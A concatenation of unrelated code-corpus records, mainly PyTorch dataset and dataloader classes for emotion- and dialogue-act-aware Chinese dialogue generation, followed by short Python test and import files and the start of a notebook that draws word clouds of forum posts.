else:
token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
def __init__(self,
data,
tokenizer,
da_type="DA", # 读取DA数据
max_history=15,
batch_first=True,
lm_labels=True,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.da_type = da_type # "DA" DA数据的列名
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # # Whether use DA to help generate dialogue
self.max_history = max_history # Maximum number of dialogue sentences
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.lm_labels = lm_labels
self.keys = list(set(self.data['Dialogue_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
dialogue_id = self.keys[index]
data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
if self.lm_labels: # for train and valid dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
current_speaker = speaker_list[-1]
current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
response = data_index["Token"].tolist()[-1]
else: # for test dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
current_speaker = speaker_list[-1]
current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
response = []
return self.process(speaker_list, utterance_history, current_speaker, current_da_id, response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def process(self, speaker_list, history, current_speaker, current_da_id, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
instance["current_da_id"] = current_da_id
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def testdata_process(self, speaker_list, history, current_speaker, current_da_id, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
instance["current_da_id"] = current_da_id
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
current_speaker_id = torch.tensor(
[torch.tensor(instance["current_speaker_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
current_da_id = torch.tensor(
[torch.tensor(instance["current_da_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, current_speaker_id, current_da_id, labels
class CPEDDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[gRDAeting], [gRDAeting], [gRDAeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
elif with_da==True:
token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[gRDAeting]": 13088
else:
token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
def __init__(self,
data,
tokenizer,
emotion_type="Sentiment", # 读取DA数据
da_type="DA",
persona_type=["Gender","Neuroticism","Extraversion","Openness","Agreeableness","Conscientiousness"],
max_history=15,
batch_first=True,
lm_labels=True,
with_current_speaker=False,
with_current_persona=False,
with_current_emotion=False,
with_current_da=False,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.emotion_type = emotion_type # 'Emotion' 情感标签列名
self.da_type = da_type # 'DA' DA标签列名
self.persona_type = persona_type
self.with_current_speaker = with_current_speaker
self.with_current_persona = with_current_persona
self.with_current_emotion = with_current_emotion
self.with_current_da = with_current_da
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # Whether use DA to help generate dialogue
self.max_history = max_history # Maximum number of dialogue sentences
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.lm_labels = lm_labels
self.keys = list(set(self.data['Dialogue_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
dialogue_id = self.keys[index]
data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
if self.lm_labels: # for train and valid dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
if self.with_emotion:
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
else:
emotion_list = []
if self.with_da:
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
else:
da_list = []
current_speaker = speaker_list[-1]
current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
if self.with_current_persona:
current_gender_id = GENDER_TO_ID[data_index[self.persona_type[0]].tolist()[-1]]
current_Neuroticism_id = BIGFIVE_TO_ID[data_index[self.persona_type[1]].tolist()[-1]]
current_Extraversion_id = BIGFIVE_TO_ID[data_index[self.persona_type[2]].tolist()[-1]]
current_Openness_id = BIGFIVE_TO_ID[data_index[self.persona_type[3]].tolist()[-1]]
current_Agreeableness_id = BIGFIVE_TO_ID[data_index[self.persona_type[4]].tolist()[-1]]
current_Conscientiousness_id = BIGFIVE_TO_ID[data_index[self.persona_type[5]].tolist()[-1]]
current_persona_ids = [current_gender_id,current_Neuroticism_id,current_Extraversion_id,current_Openness_id,
current_Agreeableness_id,current_Conscientiousness_id]
else:
current_persona_ids = []
response = data_index["Token"].tolist()[-1]
else: # for test dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
if self.with_emotion:
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
else:
emotion_list = []
if self.with_da:
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
else:
da_list = []
current_speaker = speaker_list[-1]
current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
current_da_id = DA_TO_ID[data_index[self.da_type].tolist()[-1]]
if self.with_current_persona:
current_gender_id = GENDER_TO_ID[data_index[self.persona_type[0]].tolist()[-1]]
current_Neuroticism_id = BIGFIVE_TO_ID[data_index[self.persona_type[1]].tolist()[-1]]
current_Extraversion_id = BIGFIVE_TO_ID[data_index[self.persona_type[2]].tolist()[-1]]
current_Openness_id = BIGFIVE_TO_ID[data_index[self.persona_type[3]].tolist()[-1]]
current_Agreeableness_id = BIGFIVE_TO_ID[data_index[self.persona_type[4]].tolist()[-1]]
current_Conscientiousness_id = BIGFIVE_TO_ID[data_index[self.persona_type[5]].tolist()[-1]]
current_persona_ids = [current_gender_id,current_Neuroticism_id,current_Extraversion_id,current_Openness_id,
current_Agreeableness_id,current_Conscientiousness_id]
else:
current_persona_ids = []
response = []
return self.process(speaker_list,
utterance_history,
emotion_list,
da_list,
current_speaker,
current_emotion_id,
current_da_id,
current_persona_ids,
response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def convert_EMOTION_TO_TOKENS(self,emotion_list):
emotion_tokens_list = []
if self.emotion_type=="Sentiment": # "Sentiment"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
else: # "Emotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
return emotion_tokens_list
def convert_DA_TO_TOKENS(self,da_list):
da_tokens_list = []
for da in da_list:
da_tokens_list.append(DA_TO_TOKENS[da])
return da_tokens_list
def set_da_in_speaker(self,da_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_da_ids = []
for i,da in enumerate(da_ids):
if input_ids[i] in special_token_ids_list:
new_da_ids.append(da_ids[i])
else:
new_da_ids.append(self.pad)
return new_da_ids
def set_emotion_in_speaker(self,emotion_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_emotion_ids = []
for i,emotion in enumerate(emotion_ids):
if input_ids[i] in special_token_ids_list:
new_emotion_ids.append(emotion_ids[i])
else:
new_emotion_ids.append(self.pad)
return new_emotion_ids
def process(self,
speaker_list,
history,
emotion_list,
da_list,
current_speaker,
current_emotion_id,
current_da_id,
current_persona_ids,
response,
with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_da:
instance["da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_emotion:
instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_current_speaker:
instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
if self.with_current_emotion:
instance["current_emotion_id"] = current_emotion_id
if self.with_current_da:
instance["current_da_id"] = current_da_id
if self.with_current_persona:
instance["current_persona_ids"] = current_persona_ids
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def testdata_process(self,
speaker_list,
history,
emotion_list,
da_list,
current_speaker,
current_emotion_id,
current_da_id,
current_persona_ids,
response,
with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_da:
instance["da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_emotion:
instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_current_speaker:
instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
if self.with_current_emotion:
instance["current_emotion_id"] = current_emotion_id
if self.with_current_da:
instance["current_da_id"] = current_da_id
if self.with_current_persona:
instance["current_persona_ids"] = current_persona_ids
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
if self.with_emotion:
emotion_ids = pad_sequence(
[torch.tensor(instance["emotion_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
emotion_ids = None
if self.with_da:
da_ids = pad_sequence(
[torch.tensor(instance["da_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
da_ids = None
if self.with_current_speaker:
current_speaker_id = torch.tensor(
[torch.tensor(instance["current_speaker_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
else:
current_speaker_id = None
if self.with_current_persona:
current_persona_ids = pad_sequence(
[torch.tensor(instance["current_persona_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=1) # padding_value=1 means unknown here
else:
current_persona_ids = None
if self.with_current_emotion:
current_emotion_id = torch.tensor(
[torch.tensor(instance["current_emotion_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
else:
current_emotion_id = None
if self.with_current_da:
current_da_id = torch.tensor(
[torch.tensor(instance["current_da_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
else:
current_da_id = None
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, emotion_ids, da_ids, current_speaker_id, current_persona_ids, current_emotion_id, current_da_id, labels
def build_cped_dataloaders(args, tokenizer, logger, load_test=False):
if load_test==False:
logger.info("Build train and validation dataloaders")
train_data,train_samples = get_data(args,tokenizer, args.train_path, logger) # args.train_path="/home/MMMTD/dialogue_text/mmmtd_train_split.csv"
valid_data,valid_samples = get_data(args,tokenizer, args.valid_path, logger) # args.valid_path="/home/MMMTD/dialogue_text/mmmtd_valid_split.csv"
train_dataset = CPEDDataset(data=train_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
da_type=args.da_type,
persona_type=["Gender","Neuroticism","Extraversion","Openness","Agreeableness","Conscientiousness"],
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_current_speaker=args.with_current_speaker,
with_current_persona=args.with_current_persona,
with_current_emotion=args.with_current_emotion,
with_current_da=args.with_current_da,
with_emotion=args.with_emotion,
with_da=args.with_da)
valid_dataset = CPEDDataset(data=valid_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
da_type=args.da_type,
persona_type=["Gender","Neuroticism","Extraversion","Openness","Agreeableness","Conscientiousness"],
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_current_speaker=args.with_current_speaker,
with_current_persona=args.with_current_persona,
with_current_emotion=args.with_current_emotion,
with_current_da=args.with_current_da,
with_emotion=args.with_emotion,
with_da=args.with_da)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None
valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None
train_loader = DataLoader(train_dataset,
sampler=train_sampler,
collate_fn=train_dataset.collate,
num_workers=args.num_workers,
batch_size=args.train_batch_size,
shuffle=(not args.distributed))
valid_loader = DataLoader(valid_dataset,
sampler=valid_sampler,
collate_fn=valid_dataset.collate,
num_workers=args.num_workers,
batch_size=args.valid_batch_size,
shuffle=False)
return train_loader, valid_loader, train_sampler, valid_sampler
else:
logger.info("Build test dataloaders")
test_data, test_samples = get_data(args, tokenizer, args.test_path, logger) # args.test_path="/home/MMMTD/dialogue_text/mmmtd_test_split.csv"
test_dataset = CPEDDataset(data=test_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
da_type=args.da_type,
persona_type=["Gender","Neuroticism","Extraversion","Openness","Agreeableness","Conscientiousness"],
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_current_speaker=args.with_current_speaker,
with_current_persona=args.with_current_persona,
with_current_emotion=args.with_current_emotion,
with_current_da=args.with_current_da,
with_emotion=args.with_emotion,
with_da=args.with_da)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset) if args.distributed else None
test_loader = DataLoader(test_dataset,
sampler=test_sampler,
collate_fn=test_dataset.collate,
num_workers=args.num_workers,
batch_size=args.test_batch_size,
shuffle=False)
return test_loader, test_sampler
def build_rdadial_dataloaders(args, tokenizer, logger, load_test=False):
if load_test==False:
logger.info("Build train and validation dataloaders")
train_data,train_samples = get_data(args,tokenizer, args.train_path, logger) # args.train_path="/home/MMMTD/dialogue_text/mmmtd_train_split.csv"
valid_data,valid_samples = get_data(args,tokenizer, args.valid_path, logger) # args.valid_path="/home/MMMTD/dialogue_text/mmmtd_valid_split.csv"
train_dataset = RDADIALDataset(data=train_data,
tokenizer=tokenizer,
da_type=args.da_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
valid_dataset = RDADIALDataset(data=valid_data,
tokenizer=tokenizer,
da_type=args.da_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None
valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None
train_loader = DataLoader(train_dataset,
sampler=train_sampler,
collate_fn=train_dataset.collate,
num_workers=args.num_workers,
batch_size=args.train_batch_size,
shuffle=(not args.distributed))
valid_loader = DataLoader(valid_dataset,
sampler=valid_sampler,
collate_fn=valid_dataset.collate,
num_workers=args.num_workers,
batch_size=args.valid_batch_size,
shuffle=False)
return train_loader, valid_loader, train_sampler, valid_sampler
else:
logger.info("Build test dataloaders")
test_data, test_samples = get_data(args, tokenizer, args.test_path, logger) # args.test_path="/home/MMMTD/dialogue_text/mmmtd_test_split.csv"
test_dataset = RDADIALDataset(data=test_data,
tokenizer=tokenizer,
da_type=args.da_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset) if args.distributed else None
test_loader = DataLoader(test_dataset,
sampler=test_sampler,
collate_fn=test_dataset.collate,
num_workers=args.num_workers,
batch_size=args.test_batch_size,
shuffle=False)
return test_loader, test_sampler
class BERTEDADataset(Dataset):
''' load data for train BertEDARC
'''
def __init__(self,
data,
tokenizer,
batch_first=True,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # # Whether use DA to help generate dialogue
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.keys = list(set(self.data['Utterance_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
utterance_id = self.keys[index]
data_index = self.data[self.data['Utterance_ID']==utterance_id]
utterance = data_index["Token"].tolist()[0]
emotion = EMOTION_TO_ID[data_index["Emotion"].tolist()[0]]
da = DA_TO_ID[data_index["DA"].tolist()[0]]
return self.process(utterance, emotion, da)
def process(self, utterance, emotion, da):
instance = {}
instance["input_ids"] = utterance
if self.with_emotion:
instance["emotion_ids"] = emotion
if self.with_da:
instance["da_ids"] = da
return instance
def collate(self, batch):
#input_ids = torch.tensor([torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch], dtype=torch.long)
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
if self.with_emotion:
emotion_ids = torch.tensor([torch.tensor(instance["emotion_ids"], dtype=torch.long) for instance in batch],dtype=torch.long)
else:
emotion_ids = None
if self.with_da:
da_ids = torch.tensor([torch.tensor(instance["da_ids"], dtype=torch.long) for instance in batch],dtype=torch.long)
else:
da_ids = None
return input_ids, emotion_ids, da_ids
def build_berteda_dataloaders(args, tokenizer, logger):
logger.info("Build train and validation dataloaders")
train_data,train_samples = get_data(args,tokenizer, args.train_path, logger) # args.train_path="/home/MMMTD/dialogue_text/mmmtd_train_split.csv"
valid_data,valid_samples = get_data(args,tokenizer, args.valid_path, logger) # args.valid_path="/home/MMMTD/dialogue_text/mmmtd_valid_split.csv"
train_dataset = BERTEDADataset(data=train_data,
tokenizer=tokenizer,
batch_first=False,
with_emotion=args.with_emotion,
with_da=args.with_da)
valid_dataset = BERTEDADataset(data=valid_data,
tokenizer=tokenizer,
batch_first=False,
with_emotion=args.with_emotion,
with_da=args.with_da)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None
valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None
train_loader = DataLoader(train_dataset,
sampler=train_sampler,
collate_fn=train_dataset.collate,
num_workers=args.num_workers,
batch_size=args.train_batch_size,
shuffle=(not args.distributed))
valid_loader = DataLoader(valid_dataset,
sampler=valid_sampler,
collate_fn=valid_dataset.collate,
num_workers=args.num_workers,
batch_size=args.valid_batch_size,
shuffle=False)
return train_loader, valid_loader, train_sampler, valid_sampler
| 50.96658
| 204
| 0.555281
| 10,637
| 97,601
| 4.814515
| 0.036853
| 0.028568
| 0.023627
| 0.025775
| 0.909025
| 0.895259
| 0.889401
| 0.888054
| 0.887253
| 0.884265
| 0
| 0.025969
| 0.347425
| 97,601
| 1,914
| 205
| 50.993208
| 0.778088
| 0.096884
| 0
| 0.891732
| 0
| 0
| 0.057674
| 0.00154
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048556
| false
| 0
| 0.009186
| 0.004593
| 0.110236
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1568516792be67c400c85d7535dd91fe48a83a0
| 81
|
py
|
Python
|
pandasql/run_test.py
|
Cadair/conda-recipes
|
0227a81ed80e24eefffe091836dead93f8312ffe
|
[
"BSD-3-Clause"
] | 302
|
2015-01-04T18:21:56.000Z
|
2021-11-16T12:14:37.000Z
|
pandasql/run_test.py
|
Cadair/conda-recipes
|
0227a81ed80e24eefffe091836dead93f8312ffe
|
[
"BSD-3-Clause"
] | 393
|
2015-01-03T14:35:48.000Z
|
2019-12-09T15:09:07.000Z
|
pandasql/run_test.py
|
Cadair/conda-recipes
|
0227a81ed80e24eefffe091836dead93f8312ffe
|
[
"BSD-3-Clause"
] | 325
|
2015-01-04T17:26:39.000Z
|
2021-11-04T16:25:54.000Z
|
import unittest
import pandasql.tests.tests
unittest.main(pandasql.tests.tests)
| 16.2
| 35
| 0.839506
| 11
| 81
| 6.181818
| 0.454545
| 0.382353
| 0.529412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 81
| 4
| 36
| 20.25
| 0.906667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bee89923c6e8bf3a4902faf93d6d27968cd3e98c
| 132
|
py
|
Python
|
markup/views/__init__.py
|
vmun/SkyMed_Labeling
|
9c1e2268dcdde5a8450e6f70c747902f67980f15
|
[
"MIT"
] | null | null | null |
markup/views/__init__.py
|
vmun/SkyMed_Labeling
|
9c1e2268dcdde5a8450e6f70c747902f67980f15
|
[
"MIT"
] | 6
|
2021-03-19T03:58:53.000Z
|
2022-02-10T13:41:23.000Z
|
markup/views/__init__.py
|
vladek1934/SkyMed_Labeling
|
9c1e2268dcdde5a8450e6f70c747902f67980f15
|
[
"MIT"
] | null | null | null |
from .markup_viewsets import *
from .user_viewsets import *
from .path_viewsets import *
from .apiviews import *
from .fbv import *
| 22
| 30
| 0.772727
| 18
| 132
| 5.5
| 0.444444
| 0.40404
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 132
| 5
| 31
| 26.4
| 0.883929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8306fb8bed0a86b1fe75f3a245de6b42c14fcdc2
| 201
|
py
|
Python
|
src/svr/tests/context.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 3
|
2019-05-04T12:30:00.000Z
|
2020-05-14T06:28:51.000Z
|
src/svr/tests/context.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2019-05-05T01:30:37.000Z
|
2019-05-16T02:50:04.000Z
|
src/svr/tests/context.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2020-03-27T07:12:40.000Z
|
2020-03-27T07:12:40.000Z
|
import os
import sys
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')))
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
| 28.714286
| 73
| 0.661692
| 32
| 201
| 3.90625
| 0.3125
| 0.288
| 0.208
| 0.224
| 0.864
| 0.864
| 0.864
| 0.864
| 0.864
| 0.864
| 0
| 0.01105
| 0.099502
| 201
| 6
| 74
| 33.5
| 0.679558
| 0
| 0
| 0.333333
| 0
| 0
| 0.039801
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
834f9e9feae14dcae0b705a4565e5dc397b42a10
| 13,067
|
py
|
Python
|
notebooks/eda_wordclouds.py
|
dominikmn/one-million-posts
|
a628e88874ca7134a7628d88de169e8520f8deba
|
[
"MIT"
] | null | null | null |
notebooks/eda_wordclouds.py
|
dominikmn/one-million-posts
|
a628e88874ca7134a7628d88de169e8520f8deba
|
[
"MIT"
] | 95
|
2021-03-26T14:37:37.000Z
|
2021-09-07T08:26:03.000Z
|
notebooks/eda_wordclouds.py
|
dominikmn/one-million-posts
|
a628e88874ca7134a7628d88de169e8520f8deba
|
[
"MIT"
] | 2
|
2021-04-19T15:43:57.000Z
|
2021-04-19T15:57:47.000Z
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.11.1
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %%
from utils import loading, nlp, cleaning, visualizing, feature_engineering
import pandas as pd
from nltk.corpus import stopwords
stopwords=stopwords.words('german')
from string import punctuation
from collections import Counter
import matplotlib.pyplot as plt
# %% tags=[]
df = loading.load_extended_posts()
# %%
df = feature_engineering.add_column_ann_round(df)
# %% [markdown]
# Defining function for top words for labels
# %%
def top_words_label(df, label, text, stop=False, stopwords=None, plot=True, return_list=True, all_plots=True):
df_clean=df.dropna(subset=[label])
